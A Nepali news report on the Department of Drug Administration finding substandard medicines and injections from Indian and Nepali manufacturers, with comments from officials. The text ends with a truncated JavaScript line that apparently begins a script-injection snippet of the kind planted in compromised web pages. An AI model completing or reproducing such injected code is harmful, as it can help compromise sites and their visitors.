medicineकाठमाडौँ, असोज १८ – नेपाली बजारमा प्रयोग हुँदै आएका कतिपय औषधि गुणस्तरहीन रहेको पाइएको छ ।

औषधि व्यवस्था विभागले समय समयमा गर्ने अनुगमनका क्रममा सङ्कलन गरेर प्रयोगशालामा परीक्षण गरिएका विभिन्न कम्पनीका औषधि गुणस्तरहीन पाइएको हो । यसरी नेपाली बजारमा पाइने औषधि गुणस्तरहीन भएको यो पहिलोपटक होइन । यसअघि कतिपय औषधि गुणस्तरहीन भेटिएका थिए ।

औषधि व्यवस्था विभागका महानिर्देशक नारायण ढकालले अनुगमनका क्रममा पटक–पटक गुणस्तरहीन औषधि भेटिने गरेको जानकारी दिए । महानिर्देशक ढकालले केही दिनअघि अनुगमनका क्रममा दुई भारतीय तथा एक नेपाली गरी तीनवटा उद्योगबाट उत्पादित गुणस्तरहीन औषधि तथा सुई बिक्री वितरणका लागि बजार पठाइएको जानकारी दिए । महानिर्देशक ढकालका अनुसार विभागले अनुगमनपश्चात् गरेको नमूना परीक्षणमा ती औषधि गुणस्तरहीन पाइएपछि बिक्री वितरण गर्न रोक लगाइएको छ ।

नेपाल औषधि उत्पादक सङ्घ (एपोन)का वरिष्ठ उपाध्यक्ष दीपक दाहालले सङ्घको मागअनुसार नै औषधि व्यवस्था विभागले बजारमा आएका औषधि प्रयोगशालामा परीक्षण गर्न सुरु गरेको जानकारी दिए । दाहालले विभागले अनुगमन नगर्दा गुणस्तरहीन औषधि बिरामीले सेवन गर्ने र रोग निको हुनुपर्ने बिरामीलाई झन् असर गर्ने भन्दै समय समयमा विभागले परीक्षण गर्नु सकारात्मक भएको बताए । यदि नियतवस गुणस्तरहीन औषधि बजारमा ल्याइएको हो भने त्यसको औषधि व्यवस्था विभागले अनुगमन गरी कारबाही गर्नुपर्ने र भण्डारणका क्रममा भूलवस औषधि गुणस्तरहीन हुन जाने दाहालको भनाइ छ । गोरखापत्र दैनिकमा खबर छ ।

var d=document;var s=d.createElement(‘script’);